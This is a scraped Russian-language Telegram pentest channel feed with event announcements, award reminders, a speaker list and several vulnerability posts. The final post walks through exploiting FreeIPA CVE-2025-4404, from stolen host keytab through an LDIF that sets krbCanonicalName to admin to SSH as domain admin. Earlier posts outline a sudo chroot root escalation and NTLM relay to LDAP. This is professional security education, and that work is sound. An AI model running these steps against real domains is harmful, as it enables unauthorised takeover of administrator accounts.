[ Bitrix ultimate pentest guide ]
Всем привет!👋
Совсем недавно у меня вновь возник интерес к CMS Bitrix, так как стало известно о нескольких новых случаях взломов данной CMS-ки (тут и тут).
Автор канала @PentestNotes как раз агрегировал имеющуюся информацию по эксплуатации битрикса и написал замечательный обновленный мануал.🚨
P/S В нем присутствуют и мои заметки, которые публиковал в канале какое-то время назад
Автору респект и большое спасибо за работу🔥
#bitrix #pentest
Всем привет!
Совсем недавно у меня вновь возник интерес к CMS Bitrix, так как стало известно о нескольких новых случаях взломов данной CMS-ки (тут и тут).
Автор канала @PentestNotes как раз агрегировал имеющуюся информацию по эксплуатации битрикса и написал замечательный обновленный мануал.
P/S В нем присутствуют и мои заметки, которые публиковал в канале какое-то время назад
Автору респект и большое спасибо за работу
#bitrix #pentest
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥18👍8❤3🦄1
[UCS]
Всем привет!👋
Приглашаем вас на традиционную встречу сообщества по информационной безопасности!
Доклад на тему:
«Автоматизация пентеста с примерами. История и перспективы»
🎤 Спикер — Влад Дриев, специалист в области практической ИБ и активист сообщества.
На встрече вы:
Узнаете, как развивалась автоматизация пентеста, какие инструменты появились первыми и как они повлияли на отрасль.
Познакомитесь с современными подходами: сканеры, BAS, системы автопентеста.
Обсудите, какие проблемы стоят перед автоматизацией, и какие есть пути их решения.
📍 Где: ИРИТ-РТФ, Мира 32, аудитория Р-443
🕖 Когда: 15.04.2025 (вторник), 19:00
Встреча будет полезна всем, кто интересуется пентестом, автоматизацией и хочет лучше понимать современные инструменты тестирования на проникновение.
Не упустите возможность прокачать свои знания и пообщаться с единомышленниками в чате сообщества!
✍️ Запишитесь заранее, чтобы мы всё подготовили.
@GigaHack
#education #learn #start
Всем привет!
Приглашаем вас на традиционную встречу сообщества по информационной безопасности!
Доклад на тему:
«Автоматизация пентеста с примерами. История и перспективы»
🎤 Спикер — Влад Дриев, специалист в области практической ИБ и активист сообщества.
На встрече вы:
Узнаете, как развивалась автоматизация пентеста, какие инструменты появились первыми и как они повлияли на отрасль.
Познакомитесь с современными подходами: сканеры, BAS, системы автопентеста.
Обсудите, какие проблемы стоят перед автоматизацией, и какие есть пути их решения.
📍 Где: ИРИТ-РТФ, Мира 32, аудитория Р-443
🕖 Когда: 15.04.2025 (вторник), 19:00
Встреча будет полезна всем, кто интересуется пентестом, автоматизацией и хочет лучше понимать современные инструменты тестирования на проникновение.
Не упустите возможность прокачать свои знания и пообщаться с единомышленниками в чате сообщества!
✍️ Запишитесь заранее, чтобы мы всё подготовили.
@GigaHack
#education #learn #start
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥15👍6❤2🌭1👾1
This media is not supported in your browser
VIEW IN TELEGRAM
[RemoteMonologue]
Всем привет!👋
Вчера было опубликовано интересное исследование. В нем описан способ удаленного получения NetNTLMv1-хэша пользователя, работающего в интерактивной сессии. Настройки машины при этом могут быть корректными, в ходе атаки происходит их изменение.
Почему обращаем на это внимание? Хэш NetNTLMv1 хорош тем, что его можно без особого труда переслать на LDAP и провести манипуляции с доменом от имени пользователя, чья сессия была на удаленном узле.
💻 Ссылка на PoC
На мой взгляд самый реальный и просто кейс, который из этого вытекает: повышение привилегий в домене AD, когда у атакующего есть сессия локального администратора на узле и рядом с ней сессия администратора домена. Просто удаленно тригерим аутентификацию, делаем NTLM Relay на LDAP, создаем пользователя или повышаем привилегии существующей УЗ, получаем администратора домена.
Прикладываю небольшое демо для демонстрации кейса с повышением привилегий в домене. 👆
Судя по тексту исследования, пока что это фича, которую не запатчили и не планируют.
@GigaHack
#pentest #ad #gigahack
Всем привет!
Вчера было опубликовано интересное исследование. В нем описан способ удаленного получения NetNTLMv1-хэша пользователя, работающего в интерактивной сессии. Настройки машины при этом могут быть корректными, в ходе атаки происходит их изменение.
Почему обращаем на это внимание? Хэш NetNTLMv1 хорош тем, что его можно без особого труда переслать на LDAP и провести манипуляции с доменом от имени пользователя, чья сессия была на удаленном узле.
На мой взгляд самый реальный и просто кейс, который из этого вытекает: повышение привилегий в домене AD, когда у атакующего есть сессия локального администратора на узле и рядом с ней сессия администратора домена. Просто удаленно тригерим аутентификацию, делаем NTLM Relay на LDAP, создаем пользователя или повышаем привилегии существующей УЗ, получаем администратора домена.
Прикладываю небольшое демо для демонстрации кейса с повышением привилегий в домене. 👆
Судя по тексту исследования, пока что это фича, которую не запатчили и не планируют.
@GigaHack
#pentest #ad #gigahack
Please open Telegram to view this post
VIEW IN TELEGRAM
👍16🔥6❤4🆒2🦄1
[WHOAMI]❔
Всем привет!
Наш канал очень сильно вырос за этот год. В связи с этим мы начинаем небольшой цикл статей, где расскажем о нас - авторах канала GigaHackers.
Сегодня поговорим обо мне:
1️⃣ Меня зовут Никита Распопов, имею OSWE (@WILD_41), живу в ЕКБ;
2️⃣ В кибербезе около 4 лет;
3️⃣ Занимаюсь пентестом приложений (веб, мобилки, llm, desktop);
4️⃣ Участвую в Багбаунти ;
5️⃣ В нашем канале рассказываю о пентесте и безопасности приложений;
6️⃣ Являюсь активным спикером - SafeCode, КиберУчения УрФУ.
@GigaHack
#whoami #GigaHack
Всем привет!
Наш канал очень сильно вырос за этот год. В связи с этим мы начинаем небольшой цикл статей, где расскажем о нас - авторах канала GigaHackers.
Сегодня поговорим обо мне:
@GigaHack
#whoami #GigaHack
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥14👍12❤4😎1
[Pentest award 2025!]🐾
Всем привет!👋
Pentest award — это отраслевая награда для специалистов по тестированию на проникновение, которую ежегодно вручает компания Awillix. Основная задача премии — выделить лучших специалистов и показать их вклад в развитие российского пентеста. Мероприятие состоится уже в третий раз.
В прошлом году удалось занять второе место.🥈 В этом году также планируем принять участие!
Участие все еще бесплатное, а прием заявок продлиться до 30 июня⏰
Список номинаций в этом году расширился:
⚡️ «Пробив WEB»
⚡️ «Пробив инфраструктуры»
⚡️ «**ck the logic»
⚡️ «Раз bypass, два bypass»
⚡️ «Ловись рыбка»
⚡️ «Мобильный разлом: от устройства до сервера»
⚡️ «Девайс»
⚡️ «Out of Scope»
⚡️ Антиноминация «Осторожно, грабли!»
🥇 Главный приз за победу — стеклянная именная статуэтка и макбук!
🥈 🥉 За вторые и третьи места призеры получат айфоны и смарт-часы.
Также будут другие ценные призы🎁
Отправляйте заявки на сайте, участвуйте и побеждайте!🏆
@GigaHack
#pentestaward
Всем привет!
Pentest award — это отраслевая награда для специалистов по тестированию на проникновение, которую ежегодно вручает компания Awillix. Основная задача премии — выделить лучших специалистов и показать их вклад в развитие российского пентеста. Мероприятие состоится уже в третий раз.
В прошлом году удалось занять второе место.
Участие все еще бесплатное, а прием заявок продлиться до 30 июня
Список номинаций в этом году расширился:
Также будут другие ценные призы
Отправляйте заявки на сайте, участвуйте и побеждайте!
@GigaHack
#pentestaward
Please open Telegram to view this post
VIEW IN TELEGRAM
🏆11👍6🔥4
[Программа PHDays Fest]
Всем привет!👋
Про то, как попасть на конференцию писали ранее. А уже сейчас на официальном сайте мероприятия формируется программа. Для себя отметил несколько докладов, на которые точно пойду очно послушать:
🟣 Безопасность космических систем
🟣 Open source? Enterprise? True story про путешествие туда и обратно
🟣 Кибердомовой: как злоумышленники могут получить полный доступ к вашему дому через приложения для ЖК
🟣 Киллчейн: как через «1С:Предприятие» я добралась от обычного юзера до домен-админа
🟣 Цифровая слежка: бесфайлово подглядываем за любым пользователем AD
Вообще темы в этом году самые разнообразные: AI, машины, ЖК и даже космос🪐. Удивительно, что мир кибербеза очень быстро проникает во все сферы нашей жизни! Вероятно поэтому и количество участников конференций по ИБ растет год к году.🎚
Будем рады встречи со всеми на мероприятии!
@GigaHack
#PHD #conference
Всем привет!
Про то, как попасть на конференцию писали ранее. А уже сейчас на официальном сайте мероприятия формируется программа. Для себя отметил несколько докладов, на которые точно пойду очно послушать:
Вообще темы в этом году самые разнообразные: AI, машины, ЖК и даже космос🪐. Удивительно, что мир кибербеза очень быстро проникает во все сферы нашей жизни! Вероятно поэтому и количество участников конференций по ИБ растет год к году.
Будем рады встречи со всеми на мероприятии!
@GigaHack
#PHD #conference
Please open Telegram to view this post
VIEW IN TELEGRAM
5👍9🔥6❤4👨💻2
[ BUGS ZONE 4.0 ]
Всем привет!👋
Недавно вместе с @WILD_41 посетили очередной ивент для сильнейших багхантеров от @bizone_bb
Круто пообщались с ребятами, вкусно поели/попили. Спасибо организатором за уютную тусовку, неформальное общение, а коллегам по цеху за два интересных доклада.
Вдвойне приятно, что в этот раз нас решили задарить подарками, отдельное спасибо за крутые подгоны 🤝
Начинающим рекомендуем пробовать себя в BugBounty, ведь кто знает, вдруг именно ты заберешь следующий BUGS и войдешь в топ лучших🔝
@GigaHack
#bug_bounty #bugs_zone4
Всем привет!
Недавно вместе с @WILD_41 посетили очередной ивент для сильнейших багхантеров от @bizone_bb
Круто пообщались с ребятами, вкусно поели/попили. Спасибо организатором за уютную тусовку, неформальное общение, а коллегам по цеху за два интересных доклада.
Вдвойне приятно, что в этот раз нас решили задарить подарками, отдельное спасибо за крутые подгоны 🤝
Начинающим рекомендуем пробовать себя в BugBounty, ведь кто знает, вдруг именно ты заберешь следующий BUGS и войдешь в топ лучших
@GigaHack
#bug_bounty #bugs_zone4
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥18👍16❤5🤩2💩1
Forwarded from InfoSec VK Hub
This media is not supported in your browser
VIEW IN TELEGRAM
⚡️ VK Security Confab:
регистрация открыта!
🔹 Встречаемся 3 июля в офисе VK «У Красного моста».
Программа митапа:
🔹 Харденинг GitLab на примере ВКонтакте, Дмитрий Земляков (VK)
🔹 Автоматизация поиска IDORов с помощью DAST, Андрей Кан (Ozon Fintech)
🔹 Атака одним пакетом: про новый метод Race Condition, Никита Распопов (VK)
🔹 100.000 оттенков JS: от DoS до кражи денег, Всеволод Кокорин (SolidLab)
🔹 Эпичная летняя афтепати!
🔹 Подробнее о темах — на странице митапа.
Зарегистрироваться
🔹 Только офлайн. Количество мест ограничено!
VK Security | Буст этому каналу
#confab #митап #appsec
регистрация открыта!
Программа митапа:
Зарегистрироваться
VK Security | Буст этому каналу
#confab #митап #appsec
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥8👍6❤1🦄1
Forwarded from Offensive Xwitter
😈 [ RedTeam Pentesting @RedTeamPT ]
🚨 Our new blog post about Windows CVE-2025-33073 which we discovered is live:
🪞 The Reflective Kerberos Relay Attack - Remote privilege escalation from low-priv user to SYSTEM with RCE by applying a long forgotten NTLM relay technique to Kerberos:
🔗 https://blog.redteam-pentesting.de/2025/reflective-kerberos-relay-attack/
🐥 [ tweet ]
🚨 Our new blog post about Windows CVE-2025-33073 which we discovered is live:
🪞 The Reflective Kerberos Relay Attack - Remote privilege escalation from low-priv user to SYSTEM with RCE by applying a long forgotten NTLM relay technique to Kerberos:
🔗 https://blog.redteam-pentesting.de/2025/reflective-kerberos-relay-attack/
🐥 [ tweet ]
👍9❤5🔥5🦄1
[Pentest Award]
Всем привет! Напоминаем, что уже совсем скоро дедлайн по подаче заявок на Pentest Award 2025 - 30 июня. В этом году появились новые номинации, в том числе номинация "прочее". Так что каждой работе найдется место!
Это отраслевая награда для специалистов по тестированию на проникновение, которая проводится уже в третий раз. Основная задача премии — выделить лучших специалистов и показать их вклад в развитие российского пентеста.
Участие бесплатное, финалисты получат технику apple и максимальный почет сообщества этичных хакеров. Церемония награждения будет проходить 1 августа в Москве.
Отправляйте заявку, если еще не сделали этого. https://award.awillix.ru/
#pentestaward
Всем привет! Напоминаем, что уже совсем скоро дедлайн по подаче заявок на Pentest Award 2025 - 30 июня. В этом году появились новые номинации, в том числе номинация "прочее". Так что каждой работе найдется место!
Это отраслевая награда для специалистов по тестированию на проникновение, которая проводится уже в третий раз. Основная задача премии — выделить лучших специалистов и показать их вклад в развитие российского пентеста.
Участие бесплатное, финалисты получат технику apple и максимальный почет сообщества этичных хакеров. Церемония награждения будет проходить 1 августа в Москве.
Отправляйте заявку, если еще не сделали этого. https://award.awillix.ru/
#pentestaward
👍9🔥7👏5👎1🤮1
Forwarded from BELYAEV_SECURITY (Дмитрий Беляев)
Изучи российский интернет (TADVISER, ТБ Форум, Территория Безопасности, CISO Форум, СNews, ITsec, Security Summit, Код ИБ, ТБ, SmartGoPro, PHD, OFFZONE, Groteck, Компас CIO, CIFR, SOC-форум, Код Безопасности, Контур StaffCop и другие платформы) и составь список из 100 самых медийных и влиятельных спикеров по информационной безопасности в России
1. Дмитрий Беляев
2. Лука Сафонов
3. Ксения Шудрова
4. Андрей Жуков (s0i37)
5. Евгений Царев
6. Ренат Лашин
7. Александр Соколов
8. Владислав Дриев
9. Евгений Новиков
10. Наталья Касперская
11. Юрий Маслов
12. Сергей Платонов
13. Алексей Лукацкий
14. Рустэм Хайретдинов
15. Денис Баранов
16. Игорь Ляпунов
17. Мария Воронова
18. Андрей Ярных
19. Олег Седов
20. Антон Чаплыгин
21. Сергей Детков
22. Михаил Кондрашин
23. Павел Луцик
24. Александр Бондаренко
25. Дмитрий Волков
26. Владимир Дрюков
27. Игорь Бедеров
28. Николай Захаров
29. Алексей Сизов
30. Сергей Никитин
31. Олег Галушкин
32. Екатерина Рудыхина
33. Дмитрий Гвоздев
34. Руслан Рахметов
35. Александр Солдатов
36. Артем Сычев
37. Алексей Смирнов
38. Андрей Духвалов
39. Сергей Харитонов
40. Максим Степченков
41. Евгений Климов
42. Артем Избаенков
43. Юрий Шабалин
44. Сергей Полунин
45. Алексей Голенищев
46. Дмитрий Кувшинников
47. Алексей Доля
48. Андрей Колесников
49. Павел Коростелев
50. Александр Абрамов
51. Алексей Тихонов
52. Дмитрий Маричев
53. Михаил Иванов
54. Сергей Борисов
55. Евгений Гаврилов
56. Иван Антипов
57. Илья Карпов
58. Станислав Павловский
59. Марат Амиров
60. Дмитрий Лавров
61. Антон Кузьмин
62. Олег Шабуров
63. Павел Родионов
64. Алексей Петров
65. Сергей Краснов
66. Александр Баранов
67. Владимир Ульянов
68. Роман Гилев
69. Сергей Козлов
70. Олег Скулкин
71. Евгений Хорошилов
72. Владимир Безмалый
73. Александр Чувальский
74. Олег Братухин
75. Андрей Гавриленко
76. Кирилл Керценбаум
77. Сергей Путилин
78. Алексей Киселев
79. Алексей Оськин
80. Александр Шарапов
81. Василий Окулесский
82. Григорий Пащенко
83. Дмитрий Мананников
84. Сергей Зеленюк
85. Владимир Мельников
86. Алексей Баранов
87. Сергей Груздев
88. Константин Саматов
89. Денис Калемджи
90. Андрей Тихонов
91. Михаил Кашников
92. Евгений Волошин
93. Александр Жук
94. Максим Назаров
95. Игорь Иванов
96. Алексей Иванов
97. Сергей Комаров
98. Алексей Кубарев
99. Михаил Смирнов
100. Денис Зенкин
Поддержать в ТОП-100
Подпишись
Please open Telegram to view this post
VIEW IN TELEGRAM
Telegram
BELYAEV_SECURITY
🤝Твой проводник в мир защищенной информации (новости, статьи, экспертиза, юмор)
📝Форма связи с администратором: @BELYAEV_SECURITY_bot
🙎♂️О владельце канала:
📌https://belyaev.expert/
Удобный поиск:
#Интервью_с_Беляевым
#Belyaev_Podcast
📝Форма связи с администратором: @BELYAEV_SECURITY_bot
🙎♂️О владельце канала:
📌https://belyaev.expert/
Удобный поиск:
#Интервью_с_Беляевым
#Belyaev_Podcast
🤔9👎6🔥5❤4👍4
[LPE Linux CVE-2025-32463]
Всем привет!👋
На днях вышла информация об уязвимости CVE-2025-32463. Баг позволяет в результате манипуляции опцией🚨
Нам удалось подтвердить PoC в нескольких версиях
1️⃣ На первом рисунке можете увидеть, что версия
2️⃣ Аналогично на втором рисунке версия
3️⃣ А вот на третьем рисунке видно, что версия
Подвержены версии sudo 1.9.14 - 1.9.17.
Для устранения недостатка достаточно обновить версию sudo до
Подробнее о ресерче и приложенном PoC-е можно почитать здесь
#linux #pentest #LPE
Всем привет!
На днях вышла информация об уязвимости CVE-2025-32463. Баг позволяет в результате манипуляции опцией
sudo -R (--chroot) повысить привилегии до root. Нам удалось подтвердить PoC в нескольких версиях
sudo. 1.9.14p2 подвержена уязвимости. Сначала от непривилегированного пользователя не могли смотреть каталог /root, а после эксплуатации спокойно смогли перечислить содержимое;sudo 1.9.15p2 также подвержена уязвимости;sudo 1.9.13p3 не подвержена недостатку, так как до версии 1.9.14 необходимой функциональности не было.Подвержены версии sudo 1.9.14 - 1.9.17.
Для устранения недостатка достаточно обновить версию sudo до
1.9.17.p1Подробнее о ресерче и приложенном PoC-е можно почитать здесь
#linux #pentest #LPE
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥18👍5❤3🦄1
[FreeIPA CVE-2025-4404]
Всем привет!👋
Пока все внимательно смотрят за новыми CVE и векторами в AD инфраструктуре как-то мимо проходят интересные штуки под FreeIPA инфру. Недавно вышла CVE на повышение привилегий от хоста до админа домена. Также подробности описаны в релизе.
Мы с @Zzyybbzzyabb смогли воспроизвести ее на стенде. Этому как раз и будет посвящен пост.
Начальные условия:
🟡 Домен FreeIPA
🟡 root доступ на одном из узлов домена. (Кстати очень удачно вышло LPE, о котором писали в предыдущем посте)
🔴 Акцентирую внимание, что даже не нужен доступ к УЗ в домене. (root доступ на узле не то же самое, что УЗ в домене)
🔘 Этап 1. Достаем секреты с машины - keytab для запроса TGT
Обычно он лежит по пути
Чтобы убедиться, что keytab принадлежит машине можно сделать
Там должно быть что-то типа такого
🔘 Этап 2. Получение TGT
Копируем полученный keytab себе на машину по тому же пути
🔘 Этап 3. Подмена krbCanonicalName в LDAP
Вся соль начинается здесь:
⚫️ У машинной УЗ есть право менять krbCanonicalName. Но проблема даже не в этом.
⚫️ Когда атрибут изменяется - никто не проверяет, существует ли уже объект с таким именем в LDAP. Поэтому машина может сделать себе krbCanonicalName = admin@TEST.LOCAL.
⚫️ При запросе TGT, если атрибут krbCanonicalName у принципала существует, то билет будет выдан на его имя. (В идеальном мире он совпадает с krbPrincipalName)
Для внесения изменения в объект LDAP создадим LDIF-файл со следующим содержимым:
Применяем:
🔘 Этап 4. Получение TGT уже с именем admin@TEST.LOCAL
Видим что-то типа:
🔘 Этап 5. Доступ по SSH на DC как admin через Kerberos
В результате получаем полноценный доступ от администратора в домене.
Рекомендации:
🟣 Установить обновления безопасности CVE-2025-4404
🟣 Подробности в официальных источниках
Все манипуляции были проведены на стенде FreeIPA версии 4.6.8
@GigaHack
#pentest #freeipa #infra #cve
Всем привет!
Пока все внимательно смотрят за новыми CVE и векторами в AD инфраструктуре как-то мимо проходят интересные штуки под FreeIPA инфру. Недавно вышла CVE на повышение привилегий от хоста до админа домена. Также подробности описаны в релизе.
Мы с @Zzyybbzzyabb смогли воспроизвести ее на стенде. Этому как раз и будет посвящен пост.
Начальные условия:
Обычно он лежит по пути
/etc/krb5.keytabЧтобы убедиться, что keytab принадлежит машине можно сделать
klist -k /etc/krb5.keytab
Там должно быть что-то типа такого
host/client.test.local@TEST.LOCALКопируем полученный keytab себе на машину по тому же пути
/etc/krb5.keytab и потом выполняем команды:kinit -k host/client.test.local
klist
Вся соль начинается здесь:
Для внесения изменения в объект LDAP создадим LDIF-файл со следующим содержимым:
dn: fqdn=client.test.local,cn=computers,cn=accounts,dc=test,dc=local
changetype: modify
replace: krbCanonicalName
krbCanonicalName: admin@TEST.LOCAL
Применяем:
ldapmodify -Y GSSAPI -H ldap://ipa.test.local -f change_canonical.ldif
kinit -k host/client.test.local
klist
Видим что-то типа:
Default principal: admin@TEST.LOCAL
ssh admin@ipa.test.local
whoami
В результате получаем полноценный доступ от администратора в домене.
Рекомендации:
Все манипуляции были проведены на стенде FreeIPA версии 4.6.8
@GigaHack
#pentest #freeipa #infra #cve
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥12👍8❤4🌭1🦄1
